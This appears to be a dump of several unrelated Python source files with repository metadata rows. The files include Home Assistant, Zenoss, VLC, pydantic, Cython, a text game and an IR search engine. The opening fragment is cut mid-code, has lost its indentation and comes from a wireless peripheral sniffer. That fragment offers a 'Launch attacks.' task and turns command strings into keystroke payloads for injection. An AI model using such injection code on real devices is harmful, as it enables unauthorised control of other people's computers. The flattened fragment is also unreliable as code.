while not Player._pause:
Player._flag.clear()
# Set channel
Player.channel = channel
common.radio.set_channel(channel)
            # Set feature_ping to keep receiving payloads on this channel for a few seconds
Player.feature_ping = Player.last_ping + common.timeout + channel_time
# Resume Player
Player._flag.set()
global devices
# Search in devices list
for i in range(len(devices)):
if address == devices[i].address:
# Update device's channels
if channel not in devices[i].channels:
devices[i].channels.append(channel)
devices[i].channels.sort()
            # Update the device's payloads if it satisfies the following requirements
if devices[i].model == None and len(payload) > 0 and payload not in devices[i].payloads:
devices[i].payloads.append(payload)
# Update device
devices[i] = match_device(address, devices[i].channels, devices[i].payloads)
# Keep scanning on this channel to verify the device if the device was not recognized
if devices[i].model == None:
redo_scan(channel)
else:
Player.feature_ping = Player.last_ping
break
# Add a new device to the devices
else:
payloads = []
if len(payload) > 0: payloads.append(payload)
devices.append(match_device(address, [channel], payloads))
# Found new device, keep scanning on this channel to verify the device
redo_scan(channel)
# Display the scanned the result
update_scanner_msg()
def update_scanner_msg():
global devices, menu
# Update selection limit
menu = range(len(devices))
msg = []
msg.append('----------------------------------SCAN DEVICES----------------------------------')
msg.append('{0:<4}{1:<16}{2:<24}{3:<14}{4:<8}{5:<14}'.format(
'No.', 'Address', 'Channels', 'Vendor', 'Model', 'Status'))
for i in range(len(devices)):
msg.append('{0:<4}{1:<16}{2:<24}{3:<14}{4:<8}{5:<14}'.format(
i+1,
':'.join('{:02X}'.format(b) for b in devices[i].address),
','.join(str(c) for c in devices[i].channels),
devices[i].vendor,
devices[i].model,
devices[i].status))
# Refresh display
display.refresh(msg)
def update_device(address, channel, payload):
global devices, deviceID
# Search in devices list
device = devices[deviceID]
# Update device's channels
if channel not in device.channels:
device.channels.append(channel)
device.channels.sort()
    # Update device's payloads if it satisfies the following requirements
if len(payload) > 0 and payload not in device.payloads:
device.payloads.append(payload)
# Update device
device = match_device(device.address, device.channels, device.payloads)
# Renew device
devices[deviceID] = device
if device.model != None:
# Pause player
from player import Player
Player._flag.set()
# # Update channels
# update_channels()
update_tasks_msg()
else:
update_matcher_msg()
def update_tasks_msg():
global devices, deviceID, menu
device = devices[deviceID]
|
msg = []
msg.append('----------------------------------SELECT TASKS----------------------------------')
msg.append('You selected: {0} ({1} {2})'.format(
':'.join('{:02X}'.format(b) for b in device.address),
device.vendor, device.model))
menu = range(2)
msg.append('{0:<6}{1}'.format('No.', 'Task'))
msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
# Refresh display
display.refresh(msg)
def update_matc
|
her_msg():
global devices, deviceID, menu
device = devices[deviceID]
msg = []
msg.append('----------------------------------SELECT TASKS----------------------------------')
msg.append('You selected: {0} ({1} {2})'.format(
':'.join('{:02X}'.format(b) for b in device.address),
device.vendor, device.model))
menu = []
# msg.append('{0:<6}{1}'.format('No.', 'Task'))
# msg.append('{0:<6}{1}'.format('1', 'Sniff and record packets.'))
# msg.append('{0:<6}{1}'.format('2', 'Launch attacks.'))
msg.append('')
    msg.append('* Tasks are not available right now because the device has not been located yet.')
    msg.append('* It may take minutes to locate the device, please wait...')
msg.append('')
#### Test Code For Monitoring payloads
l = len(device.payloads)
ls = l > 10 and l-10 or 0
for i in range(ls, l):
msg.append('{0:<10}{1}'.format(
i+1,
':'.join('{:02X}'.format(b) for b in device.payloads[i])))
####
# Refresh display
display.refresh(msg)
def update_sniffer_msg():
global menu, devices, deviceID
device = devices[deviceID]
menu = []
msg = []
msg.append('----------------------------------SNIFF PACKETS---------------------------------')
msg.append('{0:<10}{1} {2}'.format('Device: ', device.vendor, device.model))
msg.append('{0:<10}{1}'.format('Address: ', ':'.join('{:02X}'.format(b) for b in device.address)))
msg.append('{0:<10}{1}'.format('Channels: ', ', '.join(str(c) for c in device.channels)))
payload = array('B', [])
# channel = None
from player import Player
if len(Player.records) > 0:
# channel = Player.records[0][0]
payload = Player.records[0][1]
del Player.records[0]
# msg.append('{0:<10}{1}'.format('Channel: ', channel))
msg.append('')
# Acquire the decoder path
decoder ='{0}.decode'.format(devices[deviceID].moduler)
try:
# Decode the payload
for m in eval(decoder)(payload):
msg.append(m)
except Exception as e:
msg.append(str(e))
# Refresh display
display.refresh(msg)
# The following method also has to been optimised
def update_attacker_msg(ping_rate=0):
global menu, devices, deviceID
device = devices[deviceID]
menu = []
msg = []
msg.append('----------------------------------LAUNCH ATTACK---------------------------------')
msg.append('{0:<9}{1} {2} {3}'.format('Device', ':', device.vendor, device.model))
msg.append('{0:<9}{1} {2}'.format('Address', ':', ':'.join('{:02X}'.format(b) for b in device.address)))
msg.append('{0:<9}{1} {2}'.format('Channels', ':', ', '.join(str(c) for c in device.channels)))
from player import Player
status = len(Player.payloads) > 0 and 'Attacking...' or 'No attack request found.'
msg.append('{0:<9}{1} {2}'.format('Status', ':', status))
# Refresh ping rate
msg.append('{0:<9}{1} {2:<4}{3}'.format('Ping rate', ':', int(ping_rate), 'pks/s'))
msg.append('')
msg.append('----------------------------------ATTACK HISTORY--------------------------------')
msg.append('{0:<5}{1:<4}{2}'.format('No.', 'Ch.', 'Payload'))
l = len(Player.records)
ls = l > 10 and l-10 or 0
for i in range(ls, l):
msg.append('{0:<5}{1:<4}{2}'.format(i+1, Player.records[i][0], Player.records[i][1]))
# Refresh display
display.refresh(msg)
# Parse attack commands
def parse_attack_commands(cmds):
# Parse commands
global devices, deviceID
def split_command(cs):
cmds = []
i = 0
while i < len(cs):
if cs[i] == '<':
new_cs = ''
while i+1 < len(cs) and cs[i+1] != '>':
i += 1
new_cs += cs[i]
cmds.append(new_cs)
                i += 2  # skip past the closing '>'
            else:
                cmds.append(cs[i])
                i += 1
return cmds
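    # e.g. (hypothetical token): split_command('a<ctrl>b') -> ['a', 'ctrl', 'b']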
# Convert command list into payload list
# and append them into Player.payloads
device = devices[deviceID]
payloads = []
# from utils.devices import amazonbasics, l
|
lukas-hetzenecker/home-assistant
|
tests/components/fritzbox/__init__.py
|
Python
|
apache-2.0
| 3,106
| 0
|
"""Tests for the AVM Fritz!Box integration."""
from __future__ import annotations
from typing import Any
from unittest.mock import Mock
from homeassistant.components.fritzbox.const import DOMAIN
from homeassistant.core import HomeAssistant
from .const import (
CONF_FAKE_AIN,
CONF_FAKE_MANUFACTURER,
CONF_FAKE_NAME,
CONF_FAKE_PRODUCTNAME,
)
from tests.common import MockConfigEntry
async def setup_config_entry(
hass: HomeAssistant,
data: dict[str, Any],
unique_id: str = "any",
device: Mock = None,
fritz: Mock = None,
) -> bool:
"""Do setup of a MockConfigEntry."""
entry = MockConfigEntry(
domain=DOMAIN,
data=data,
unique_id=unique_id,
)
entry.add_to_hass(hass)
if device is not None and fritz is not None:
fritz().get_devices.return_value = [device]
result = await hass.config_entries.async_setup(entry.entry_id)
if device is not None:
await hass.async_block_till_done()
return result
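# Typical call from a test (sketch; the entry data and the ``fritz`` fixture
# are hypothetical stand-ins for what the real tests provide):
#
#   device = FritzDeviceSwitchMock()
#   assert await setup_config_entry(
#       hass, {"host": "10.0.0.1"}, device=device, fritz=fritz
#   )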
class FritzDeviceBaseMock(Mock):
"""base mock of a AVM Fritz!Box binary sensor device."""
ain = CONF_FAKE_AIN
manufacturer = CONF_FAKE_MANUFACTURER
name = CONF_FAKE_NAME
productname = CONF_FAKE_PRODUCTNAME
class FritzDeviceBinarySensorMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box binary sensor device."""
alert_state = "fake_state"
battery_level = 23
fw_version = "1.2.3"
has_alarm = T
|
rue
has_powermeter = False
has_switch = False
has_temperature_sensor = False
has_thermostat = False
present = True
class FritzDeviceClimateMock(Fritz
|
DeviceBaseMock):
"""Mock of a AVM Fritz!Box climate device."""
actual_temperature = 18.0
alert_state = "fake_state"
battery_level = 23
battery_low = True
comfort_temperature = 22.0
device_lock = "fake_locked_device"
eco_temperature = 16.0
fw_version = "1.2.3"
has_alarm = False
has_powermeter = False
has_switch = False
has_temperature_sensor = False
has_thermostat = True
holiday_active = "fake_holiday"
lock = "fake_locked"
present = True
summer_active = "fake_summer"
target_temperature = 19.5
window_open = "fake_window"
class FritzDeviceSensorMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box sensor device."""
battery_level = 23
device_lock = "fake_locked_device"
fw_version = "1.2.3"
has_alarm = False
has_powermeter = False
has_switch = False
has_temperature_sensor = True
has_thermostat = False
lock = "fake_locked"
present = True
temperature = 1.23
rel_humidity = 42
class FritzDeviceSwitchMock(FritzDeviceBaseMock):
"""Mock of a AVM Fritz!Box switch device."""
battery_level = None
device_lock = "fake_locked_device"
energy = 1234
voltage = 230
fw_version = "1.2.3"
has_alarm = False
has_powermeter = True
has_switch = True
has_temperature_sensor = True
has_thermostat = False
switch_state = "fake_state"
lock = "fake_locked"
power = 5678
present = True
temperature = 1.23
|
zenoss/ZenPacks.community.VMwareESXMonitor
|
ZenPacks/community/VMwareESXMonitor/modeler/plugins/zenoss/snmp/Esx.py
|
Python
|
gpl-2.0
| 1,873
| 0.003203
|
###########################################################################
#
# This program is part of Zenoss Core, an open source monitoring platform.
# Copyright (C) 2009, Zenoss Inc.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 as published by
# the Free Software Foundation.
#
# For complete information please visit: http://www.zenoss.com/oss/
#
###########################################################################
__doc__="""Esx
Plugin to gather information about virtual machines running
under a VMWare ESX server v3.0
"""
import Globals
from Products.DataCollector.plugins.CollectorPlugin \
import SnmpPlugin, GetTableMap
from Products.DataCollector.plugins.DataMaps \
import ObjectMap
class Esx(SnmpPlugin):
# compname = "os"
relname = "guestDevices"
modname = 'ZenPacks.zenoss.ZenossVi
|
rtualHostMonitor.VirtualMachine'
columns = {
'.1': 'snmpindex',
'.2': 'displayName',
'.4': 'osType',
'.5': 'memory',
'.6': 'adminStatus',
'.7': 'vmid',
'.8': 'operStatus',
}
snmpGetTableMaps = (
        GetTableMap('vminfo', '.1.3.6.1.4.1.6876.2.1.1', columns),
)
def process(self, device, results, log):
log.info('processing %s for device %s', self.name(), device.id)
getdata, tabledata = results
table = tabledata.get("vminfo")
rm = self.relMap()
for info in table.values():
info['adminStatus'] = info['adminStatus'] == 'poweredOn'
info['operStatus'] = info['operStatus'] == 'running'
info['snmpindex'] = info['vmid']
del info['vmid']
om = self.objectMap(info)
om.id = self.prepId(om.displayName)
rm.append(om)
return [rm]
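# Hedged sketch (illustration only, not part of the plugin): process() above
# normalizes each 'vminfo' SNMP row roughly as follows; the literal values in
# this sample row are made up.
sample_row = {'snmpindex': 1, 'displayName': 'vm01', 'osType': 'linuxGuest',
              'memory': 2048, 'adminStatus': 'poweredOn', 'vmid': 16,
              'operStatus': 'running'}
sample_row['adminStatus'] = sample_row['adminStatus'] == 'poweredOn'  # -> True
sample_row['operStatus'] = sample_row['operStatus'] == 'running'      # -> True
sample_row['snmpindex'] = sample_row.pop('vmid')                      # reindex by vmid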
|
leppa/home-assistant
|
homeassistant/components/vlc_telnet/media_player.py
|
Python
|
apache-2.0
| 7,570
| 0.000132
|
"""Provide functionality to interact with the vlc telnet interface."""
import logging
from python_telnet_vlc import ConnectionError as ConnErr, VLCTelnet
import voluptuous as vol
from homeassistant.components.media_player import PLATFORM_SCHEMA, MediaPlayerDevice
from homeassistant.components.media_player.const import (
MEDIA_TYPE_MUSIC,
SUPPORT_CLEAR_PLAYLIST,
SUPPORT_NEXT_TRACK,
SUPPORT_PAUSE,
SUPPORT_PLAY,
SUPPORT_PLAY_MEDIA,
SUPPORT_PREVIOUS_TRACK,
SUPPORT_SEEK,
SUPPORT_SHUFFLE_SET,
SUPPORT_STOP,
SUPPORT_VOLUME_MUTE,
SUPPORT_VOLUME_SET,
)
from homeassistant.const import (
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
STATE_IDLE,
STATE_PAUSED,
STATE_PLAYING,
STATE_UNAVAILABLE,
)
import homeassistant.helpers.config_validation as cv
_LOGGER = logging.getLogger(__name__)
DOMAIN = "vlc_telnet"
DEFAULT_NAME = "VLC-TELNET"
DEFAULT_PORT = 4212
SUPPORT_VLC = (
SUPPORT_PAUSE
| SUPPORT_SEEK
| SUPPORT_VOLUME_SET
| SUPPORT_VOLUME_MUTE
| SUPPORT_PREVIOUS_TRACK
| SUPPORT_NEXT_TRACK
| SUPPORT_PLAY_MEDIA
| SUPPORT_STOP
| SUPPORT_CLEAR_PLAYLIST
| SUPPORT_PLAY
| SUPPORT_SHUFFLE_SET
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_PORT, default=DEFAULT_PORT): cv.positive_int,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up the vlc platform."""
add_entities(
[
VlcDevice(
config.get(CONF_NAME),
config.get(CONF_HOST),
config.get(CONF_PORT),
config.get(CONF_PASSWORD),
)
],
True,
)
class VlcDevice(MediaPlayerDevice):
"""Representation of a vlc player."""
def __init__(self, name, host, port, passwd):
"""Initialize the vlc device."""
self._instance = None
self._name = name
self._volume = None
self._muted = None
self._state = STATE_UNAVAILABLE
self._media_position_updated_at = None
self._media_position = None
self._media_duration = None
self._host = host
self._port = port
self._password = passwd
self._vlc = None
self._available = False
self._volume_bkp = 0
self._media_artist = ""
self._media_title = ""
def update(self):
"""Get the latest details from the device."""
if self._vlc is None:
try:
self._vlc = VLCTelnet(self._host, self._password, self._port)
self._state = STATE_IDLE
self._available = True
except (ConnErr, EOFError):
self._available = False
self._vlc = None
else:
try:
status = self._vlc.status()
if status:
if "volume" in status:
self._volume = int(status["vo
|
lume"]) / 500.0
else:
self._volume = None
if "state" in status:
state = status["state"]
if state == "playing":
self._state = STATE_PLAYING
elif state == "paused":
self._state = STATE_PAUSED
else:
self._state = STATE_IDLE
else:
self._state = STATE_IDLE
self._media_duration = self._vlc.get_length()
self._media_position = self._vlc.get_time()
info = self._vlc.info()
if info:
self._media_artist = info[0].get("artist")
self._media_title = info[0].get("title")
except (ConnErr, EOFError):
self._available = False
self._vlc = None
return True
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self._state
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self._available
@property
def volume_level(self):
"""Volume level of the media player (0..1)."""
return self._volume
@property
def is_volume_muted(self):
"""Boolean if volume is currently muted."""
return self._muted
@property
def supported_features(self):
"""Flag media player features that are supported."""
return SUPPORT_VLC
@property
def media_content_type(self):
"""Content type of current playing media."""
return MEDIA_TYPE_MUSIC
@property
def media_duration(self):
"""Duration of current playing media in seconds."""
return self._media_duration
@property
def media_position(self):
"""Position of current playing media in seconds."""
return self._media_position
@property
def media_position_updated_at(self):
"""When was the position of the current playing media valid."""
return self._media_position_updated_at
@property
def media_title(self):
"""Title of current playing media."""
return self._media_title
@property
def media_artist(self):
"""Artist of current playing media, music track only."""
return self._media_artist
def media_seek(self, position):
"""Seek the media to a specific location."""
track_length = self._vlc.get_length() / 1000
self._vlc.seek(position / track_length)
def mute_volume(self, mute):
"""Mute the volume."""
if mute:
self._volume_bkp = self._volume
self._volume = 0
self._vlc.set_volume("0")
else:
self._vlc.set_volume(str(self._volume_bkp))
self._volume = self._volume_bkp
self._muted = mute
def set_volume_level(self, volume):
"""Set volume level, range 0..1."""
self._vlc.set_volume(str(volume * 500))
self._volume = volume
def media_play(self):
"""Send play command."""
self._vlc.play()
self._state = STATE_PLAYING
def media_pause(self):
"""Send pause command."""
self._vlc.pause()
self._state = STATE_PAUSED
def media_stop(self):
"""Send stop command."""
self._vlc.stop()
self._state = STATE_IDLE
def play_media(self, media_type, media_id, **kwargs):
"""Play media from a URL or file."""
if media_type != MEDIA_TYPE_MUSIC:
_LOGGER.error(
"Invalid media type %s. Only %s is supported",
media_type,
MEDIA_TYPE_MUSIC,
)
return
self._vlc.add(media_id)
self._state = STATE_PLAYING
def media_previous_track(self):
"""Send previous track command."""
self._vlc.prev()
def media_next_track(self):
"""Send next track command."""
self._vlc.next()
def clear_playlist(self):
"""Clear players playlist."""
self._vlc.clear()
def set_shuffle(self, shuffle):
"""Enable/disable shuffle mode."""
self._vlc.random(shuffle)
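# Hedged usage sketch (an addition, not part of the platform): outside Home
# Assistant the entity can be exercised directly; the host and password below
# are made up, and update() needs a reachable VLC telnet interface.
def _example_direct_use():
    player = VlcDevice("office vlc", "192.168.1.50", DEFAULT_PORT, "secret")
    player.update()  # first call connects and refreshes state
    if player.available:
        player.set_volume_level(0.4)
        player.media_play()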
|
samuelcolvin/pydantic
|
tests/test_create_model.py
|
Python
|
mit
| 6,429
| 0.001555
|
import pytest
from pydantic import BaseModel, Extra, Field, ValidationError, create_model, errors, validator
def test_create_model():
model = create_model('FooModel', foo=(str, ...), bar=123)
assert issubclass(model, BaseModel)
assert issubclass(model.__config__, BaseModel.Config)
assert model.__name__ == 'FooModel'
assert model.__fields__.keys() == {'foo', 'bar'}
assert model.__validators__ == {}
assert model.__config__.__name__ == 'Config'
assert model.__module__ == 'pydantic.main'
def test_create_model_usage():
model = create_model('FooModel', foo=(str, ...), bar=123)
m = model(foo='hello')
assert m.foo == 'hello'
assert m.bar == 123
with pytest.raises(ValidationError):
model()
with pytest.raises(ValidationError):
model(foo='hello', bar='xxx')
def test_create_model_pickle(create_module):
"""
    Pickle only works for a dynamically created model if it was defined globally
    with its class name and the module where it's defined was specified.
"""
@create_module
def module():
import pickle
from pydantic import create_model
FooModel = create_model('FooModel', foo=(str, ...), bar=123, __module__=__name__)
m = FooModel(foo='hello')
d = pickle.dumps(m)
m2 = pickle.loads(d)
assert m2.foo == m.foo == 'hello'
assert m2.bar == m.bar == 123
assert m2 == m
assert m2 is not m
def test_invalid_name():
with pytest.warns(RuntimeWarning):
model = create_model('FooModel', _foo=(str, ...))
assert len(model.__fields__) == 0
def test_field_wrong_tuple():
with pytest.raises(errors.ConfigError):
create_model('FooModel', foo=(1, 2, 3))
def test_config_and_base():
with pytest.raises(errors.ConfigError):
create_model('FooModel', __config__=BaseModel.Config, __base__=BaseModel)
def test_inheritance():
class BarModel(BaseModel):
x = 1
y = 2
    model = create_model('FooModel', foo=(str, ...), bar=(int, 123), __base__=BarModel)
assert model.__fields__.keys() == {'foo', 'bar', 'x', 'y'}
m = model(foo='a', x=4)
    assert m.dict() == {'bar': 123, 'foo': 'a', 'x': 4, 'y': 2}
def test_custom_config():
class Config:
fields = {'foo': 'api-foo-field'}
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(**{'api-foo-field': '987'}).foo == 987
assert issubclass(model.__config__, BaseModel.Config)
with pytest.raises(ValidationError):
model(foo=654)
def test_custom_config_inherits():
class Config(BaseModel.Config):
fields = {'foo': 'api-foo-field'}
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(**{'api-foo-field': '987'}).foo == 987
assert issubclass(model.__config__, BaseModel.Config)
with pytest.raises(ValidationError):
model(foo=654)
def test_custom_config_extras():
class Config(BaseModel.Config):
extra = Extra.forbid
model = create_model('FooModel', foo=(int, ...), __config__=Config)
assert model(foo=654)
with pytest.raises(ValidationError):
model(bar=654)
def test_inheritance_validators():
class BarModel(BaseModel):
@validator('a', check_fields=False)
def check_a(cls, v):
if 'foobar' not in v:
raise ValueError('"foobar" not found in a')
return v
model = create_model('FooModel', a='cake', __base__=BarModel)
assert model().a == 'cake'
assert model(a='this is foobar good').a == 'this is foobar good'
with pytest.raises(ValidationError):
model(a='something else')
def test_inheritance_validators_always():
class BarModel(BaseModel):
@validator('a', check_fields=False, always=True)
def check_a(cls, v):
if 'foobar' not in v:
raise ValueError('"foobar" not found in a')
return v
model = create_model('FooModel', a='cake', __base__=BarModel)
with pytest.raises(ValidationError):
model()
assert model(a='this is foobar good').a == 'this is foobar good'
with pytest.raises(ValidationError):
model(a='something else')
def test_inheritance_validators_all():
class BarModel(BaseModel):
@validator('*')
def check_all(cls, v):
return v * 2
model = create_model('FooModel', a=(int, ...), b=(int, ...), __base__=BarModel)
assert model(a=2, b=6).dict() == {'a': 4, 'b': 12}
def test_funky_name():
model = create_model('FooModel', **{'this-is-funky': (int, ...)})
m = model(**{'this-is-funky': '123'})
assert m.dict() == {'this-is-funky': 123}
with pytest.raises(ValidationError) as exc_info:
model()
assert exc_info.value.errors() == [
{'loc': ('this-is-funky',), 'msg': 'field required', 'type': 'value_error.missing'}
]
def test_repeat_base_usage():
class Model(BaseModel):
a: str
assert Model.__fields__.keys() == {'a'}
model = create_model('FooModel', b=1, __base__=Model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
model2 = create_model('Foo2Model', c=1, __base__=Model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
assert model2.__fields__.keys() == {'a', 'c'}
model3 = create_model('Foo2Model', d=1, __base__=model)
assert Model.__fields__.keys() == {'a'}
assert model.__fields__.keys() == {'a', 'b'}
assert model2.__fields__.keys() == {'a', 'c'}
assert model3.__fields__.keys() == {'a', 'b', 'd'}
def test_dynamic_and_static():
class A(BaseModel):
x: int
y: float
z: str
DynamicA = create_model('A', x=(int, ...), y=(float, ...), z=(str, ...))
for field_name in ('x', 'y', 'z'):
assert A.__fields__[field_name].default == DynamicA.__fields__[field_name].default
def test_config_field_info_create_model():
class Config:
fields = {'a': {'description': 'descr'}}
m1 = create_model('M1', __config__=Config, a=(str, ...))
assert m1.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
m2 = create_model('M2', __config__=Config, a=(str, Field(...)))
assert m2.schema()['properties'] == {'a': {'title': 'A', 'description': 'descr', 'type': 'string'}}
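# Hedged sketch (an addition, not one of the original tests): the same
# field-tuple syntax exercised above builds a throwaway model inline.
def example_dynamic_model():
    User = create_model('User', name=(str, ...), age=(int, 0))
    u = User(name='alice')
    assert u.dict() == {'name': 'alice', 'age': 0}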
|
bzzzz/cython
|
tests/run/pure_py.py
|
Python
|
apache-2.0
| 4,851
| 0.013193
|
import cython
def test_sizeof():
"""
>>> test_sizeof()
True
True
True
True
True
"""
x = cython.declare(cython.bint)
print(cython.sizeof(x) == cython.sizeof(cython.bint))
print(cython.sizeof(cython.char) <= cython.sizeof(cython.short) <= cython.sizeof(cython.int) <= cython.sizeof(cython.long) <= cython.sizeof(cython.longlong))
print(cython.sizeof(cython.uint) == cython.sizeof(cython.int))
print(cython.sizeof(cython.p_int) == cython.sizeof(cython.p_double))
if cython.compiled:
print(cython.sizeof(cython.char) < cython.sizeof(cython.longlong))
else:
print(cython.sizeof(cython.char) == 1)
## CURRENTLY BROKEN - FIXME!!
## def test_declare(n):
## """
## >>> test_declare(100)
## (100, 100)
## >>> test_declare(100.5)
## (100, 100)
## >>> test_declare(None)
## Traceback (most recent call last):
## ...
## TypeError: an integer is required
## """
## x = cython.declare(cython.int)
## y = cython.declare(cython.int, n)
## if cython.compiled:
## cython.declare(xx=cython.int, yy=cython.long)
## i = sizeof(xx)
## ptr = cython.declare(cython.p_int, cython.address(y))
## return y, ptr[0]
@cython.locals(x=cython.double, n=cython.int)
def test_cast(x):
"""
>>> test_cast(1.5)
1
"""
n = cython.cast(cython.int, x)
return n
@cython.locals(x=cython.int, y=cython.p_int)
def test_address(x):
"""
>>> test_address(39)
39
"""
y = cython.address(x)
return y[0]
## CURRENTLY BROKEN - FIXME!!
## @cython.locals(x=cython.int)
## @cython.locals(y=cython.bint)
## def test_locals(x):
## """
## >>> test_locals(5)
## True
## """
## y = x
## return y
def test_with_nogil(nogil):
"""
>>> raised = []
>>> class nogil(object):
... def __enter__(self):
... pass
... def __exit__(self, exc_class, exc, tb):
... raised.append(exc)
... return exc_class is None
>>> test_with_nogil(nogil())
WORKS
True
>>> raised
[None]
"""
result = False
with nogil:
print("WORKS")
with cython.nogil:
result = True
return result
## CURRENTLY BROKEN - FIXME!!
## MyUnion = cython.union(n=cython.int, x=cython.double)
## MyStruct = cython.struct(is_integral=cython.bint, data=MyUnion)
## MyStruct2 = cython.typedef(MyStruct[2])
## def test_struct(n, x):
## """
## >>> test_struct(389, 1.64493)
## (389, 1.64493)
## """
## a = cython.declare(MyStruct2)
## a[0] = MyStruct(True, data=MyUnion(n=n))
## a[1] = MyStruct(is_integral=False, data={'x': x})
## return a[0].data.n, a[1].data.x
import cython as cy
from cython import declare, cast, locals, address, typedef, p_void, compiled
from cython import declare as my_declare, locals as my_locals, p_void as my_void_star, typedef as my_typedef, compiled as my_compiled
@my_locals(a=cython.p_void)
def test_imports():
"""
>>> test_imports() # (True, True)
True
"""
a = cython.NULL
    b = declare(p_void, cython.NULL)
c = my_declare(my_void_star, cython.NULL)
d = cy.declare(cy.p_void, cython.NULL)
## CURRENTLY BROKEN - FIXME!!
#return a == d, compiled == my_compiled
return compiled == my_compiled
## CURRENTLY BROKEN - FIXME!!
## MyStruct3 = typedef(MyStruct[3])
## MyStruct4 = my_typedef(MyStruct[4])
## MyStruct5 = cy.typedef(MyStruct[5])
def test_declare_c_types(n):
"""
>>> test_declare_c_types(0)
>>> test_declare_c_types(1)
>>> test_declare_c_types(2)
"""
#
b00 = cython.declare(cython.bint, 0)
b01 = cython.declare(cython.bint, 1)
b02 = cython.declare(cython.bint, 2)
#
i00 = cython.declare(cython.uchar, n)
i01 = cython.declare(cython.char, n)
i02 = cython.declare(cython.schar, n)
i03 = cython.declare(cython.ushort, n)
i04 = cython.declare(cython.short, n)
i05 = cython.declare(cython.sshort, n)
i06 = cython.declare(cython.uint, n)
i07 = cython.declare(cython.int, n)
i08 = cython.declare(cython.sint, n)
i09 = cython.declare(cython.slong, n)
i10 = cython.declare(cython.long, n)
i11 = cython.declare(cython.ulong, n)
i12 = cython.declare(cython.slonglong, n)
i13 = cython.declare(cython.longlong, n)
i14 = cython.declare(cython.ulonglong, n)
i20 = cython.declare(cython.Py_ssize_t, n)
i21 = cython.declare(cython.size_t, n)
#
f00 = cython.declare(cython.float, n)
f01 = cython.declare(cython.double, n)
f02 = cython.declare(cython.longdouble, n)
#
#z00 = cython.declare(cython.complex, n+1j)
#z01 = cython.declare(cython.floatcomplex, n+1j)
#z02 = cython.declare(cython.doublecomplex, n+1j)
#z03 = cython.declare(cython.longdoublecomplex, n+1j)
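# Hedged sketch (an addition, not one of the original doctests): typed locals
# declared this way compile to C variables under Cython but remain ordinary
# Python names when interpreted.
@cython.locals(total=cython.double, i=cython.int)
def example_typed_sum(n):
    total = 0.0
    for i in range(n):
        total += i
    return total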
|
brunitto/python-runner
|
lib/stages/cairo_museum.py
|
Python
|
mit
| 1,374
| 0
|
"""cairo_museum.py"""
from lib.stage import Stage
class CairoMuseum(Stage):
"""Cairo Museum stage"""
def desc(self):
"""Describe action"""
action = """
After getting the first replicant, you call some old friends and some of them
mention something about a hippie woman that likes no jokes. You get the next
ship to Cairo and go to a big museum. Everything smells of dust and there are a
lot of camels and people around. In an isolated corner, you see a different
woman in a bad mood, looking at you from time to time...
"""
self.console.simulate_typing(action)
    def look(self):
"""Look action"""
action = """
Everyone seems to be busy looking at the art, mainly the big statues; nothing
suspicious, except for a different woman in the corner...
"""
self.console.simulate_typing(action)
def talk(self):
"""Talk action"""
action = """
You say 'hi' to the woman...
"""
        self.console.simulate_typing(action)
def joke(self):
"""Joke action"""
action = """
You tell a really good joke and an old mummy starts laughing...
"""
self.console.simulate_typing(action)
def fight(self):
"""Fight action"""
action = """
You try to start a fight, but a camel holds you and tells you to calm down...
"""
self.console.simulate_typing(action)
|
Jverma/InfoR
|
InfoR/ProbabilitisticModels.py
|
Python
|
mit
| 5,245
| 0.045567
|
# -*- coding: utf-8 -*-
# A search engine based on probabilistic models of information retrieval.
# Author - Janu Verma
# email - jv367@cornell.edu
# http://januverma.wordpress.com/
# @januverma
import sys
from pydoc import help
import os
from collections import defaultdict
from math import log, sqrt
import operator
class ProbModel:
"""
    Implements probabilistic models for information retrieval.
"""
def __init__(self, directory):
"""
Arguments:
directory - Directory of documents to be searched.
"""
self.corpus = os.listdir(directory)
self.text = {}
for f in self.corpus:
f = os.path.join(directory,f)
with open(f) as doc:
info = doc.read()
self.text[f] = info
def words(self, document):
"""
All the words in a document.
Arguments:
document : A textual document.
Returns:
A list containing all the words in the document.
"""
words = document.split()
words = [x.lower() for x in words]
        words = [x for x in words if len(x) >= 2 and not x.isdigit()]
return words
def word_freq(self, wordlist):
"""
        Build a dictionary of words with the frequencies of their occurrence in the document.
Arguments:
            wordlist : A list of all the words in a document.
Returns:
A dictionary containing all the words in the document with their frequencies.
"""
wordFreq = defaultdict(int)
for w in wordlist:
wordFreq[w] += 1
return wordFreq
def vocabalury(self):
"""
All the words in the corpus.
Returns:
A list of all the words in the corpus.
"""
allWords = []
allDocs = self.text
for d in allDocs.keys():
d = allDocs[d]
docWords = self.words(d)
allWords.extend(docWords)
return allWords
def doc_freq(self):
"""
Compute the document frequency of all the terms in the corpus.
Returns:
A dictionary of all the terms in the corpus with their document frequency.
"""
allWords = self.vocabalury()
allWords = set(allWords)
allDocs = self.text
docFreq = defaultdict(int)
for x in allWords:
for d in allDocs.keys():
d = allDocs[d]
docTerms = self.words(d)
if (x in docTerms):
docFreq[x] += 1
return docFreq
def docScore(self, document, query, k, b):
"""
Compute the log odds ratio of the document being relevant to the query.
Arguments:
document : A textual document.
query : The search query.
k : tuning parameter for term frequency.
            b : tuning parameter for document length.
Returns:
            A floating point relevance score.
"""
# total number of docs
n = len(self.corpus)
# words in the document
docText = self.words(document)
# length of the document
l = len(docText)
# average length of a document
l_av = float(len(self.vocabalury()))/n
# document frequency dict
df = self.doc_freq()
# words in the document
tokens = self.words(document)
#term frequency dict
tf = self.word_freq(tokens)
        # initialize the score for the document
